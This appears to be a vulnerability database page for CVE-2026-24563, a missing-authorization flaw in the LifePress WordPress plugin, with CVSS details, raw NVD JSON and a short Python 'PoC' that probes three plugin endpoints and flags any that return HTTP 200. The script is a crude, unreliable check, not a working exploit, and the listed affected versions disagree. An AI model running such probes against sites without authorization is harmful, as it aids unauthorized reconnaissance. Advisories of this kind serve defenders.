Security Vulnerability Report
中文
CVE-2026-24563 CVSS 4.3 MEDIUM

CVE-2026-24563

Published: 2026-01-23 15:16:14
Last Modified: 2026-04-28 15:16:15

Description

Missing Authorization vulnerability in Ashan Perera LifePress lifepress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LifePress: from n/a through <= 2.2.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LifePress <= 2.2.1
LifePress 2.1.3 (confirmed vulnerable)
LifePress < 2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24563 PoC - LifePress Broken Access Control # Target: WordPress site with LifePress plugin <= 2.2.1 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-24563 Missing Authorization in LifePress plugin """ # Vulnerable endpoints - these may vary based on plugin configuration vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=lifepress_settings', '/wp-content/plugins/lifepress/includes/' ] print(f'[*] Testing target: {target_url}') print(f'[*] CVE-2026-24563: LifePress <= 2.2.1 Broken Access Control') # Test with low-privilege user session or unauthenticated for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f'[+] Potential vulnerable endpoint found: {url}') print(f'[+] Status code: {response.status_code}') except requests.RequestException as e: print(f'[-] Error accessing {url}: {e}') print('[*] PoC completed. Manual verification required.') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2026-24563-poc.py <target_url>') sys.exit(1) check_vulnerability(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24563", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:13.780", "lastModified": "2026-04-28T15:16:14.573", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ashan Perera LifePress lifepress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LifePress: from n/a through <= 2.2.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ashan Perera LifePress lifepress permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a LifePress: desde n/a hasta &lt;= 2.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lifepress/vulnerability/wordpress-lifepress-plugin-2-1-3-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}